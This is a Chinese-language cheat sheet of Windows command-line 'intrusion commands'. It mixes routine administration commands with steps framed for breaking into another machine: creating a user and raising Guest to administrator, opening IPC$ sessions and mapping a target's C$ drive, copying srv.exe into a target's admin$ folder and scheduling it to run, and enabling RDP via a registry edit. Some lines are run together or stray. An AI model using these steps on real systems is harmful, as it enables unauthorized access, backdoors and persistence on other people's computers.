cmd中常用入侵命令

administrator



@echo off
pause
net user loveyin /add 新建用户，loveyin是用户名
net user guest /active:yes Guest用户激活
net user guest 1234 net localgroup administrators guest /add 提权到管理员权限
net user loveyin 查看用户信息

net use \\ip\ipc$ "" /user:"" 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地



net start 查看开启了哪些服务

net stop 停止某服务

net time \\ 目标ip 查看对方时间

net view \\ip 查看对方局域网内开启了哪些共享

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

netstat -an 查看开启了哪些端口

netstat -s 查看正在使用的所有协议使用情况

nbtstat -a IP 局域网看MAC，查看对方最近登陆的用户名

ping ip -t 一直拨通PING

ping -a IP 获取该电脑的名称

Ping 电脑名称 获得该电脑的IP地址

del -F 文件名 可删除只读文件

del /S /Q 目录 move 盘符\路径\要移动的文件名

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算

telnet ip 端口 远和登陆服务器

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录

copy c:\srv.exe \\ip\admin$\system32 /y 复制本地c:\srv.exe到对方的admin下

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树

arp -a 显示正在连接本机的网络全部信息

arp -d 清楚连接信息

arp -s ip绑定

dir 查看文件 /T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

echo on或off 打开或关闭echo

title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿 、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

find 文件名 查找某文件

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFs 例Format D:/FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

chkdsk /F D: 检查磁盘D并显示状态报告

regedit /s 注册表文件名 导入注册表

regedit /e 注册

表文件名 导出注册表

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态 /rebootonerror参数，则电脑将会重新开机
实例 开启3389端口远程 cmd中输入：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 连接3389远程 mstsc /v: IP:Port /console IP:Port分别指IP和端口

at 22:00 Shutdown -s 到了22点电脑就会出现“系统关机”对话框

Shutdown.exe -s -t 3600 表示60分钟后自动关机

shutdown /r /t 0 立即重启本地主机

shutdown.exe -a 取消关机 -r 关机并重启 -l 注销当前用户

net start messenger 启用信使服务

net send ip/computer_name/nick_name 消息内容

netsh int ip reset reaetlog.txt 复位网络连接

netsh int ip add dns "" 202.96.134.133 添加DNS地址

netsh int ip add dns "" 202.96.128.86 index=2

net share sharename = drive:path /users: number | /unlimited /remark: "text" sharename是共享资源的网络名称。

drive path指定共享目录的绝对路径。

/users number设置可同时访问共享资源的最大用户数

/unlimited不限制同时访问共享资源的用户数。

/remark: " text" 添加关于资源的注释，注释文字用引号引住。

mysql -h主机地址 -u用户名 －p密码

mysql*** -u用户名 -p旧密码 password 新密码 修改密码


00:26:9E:F5:D4:B5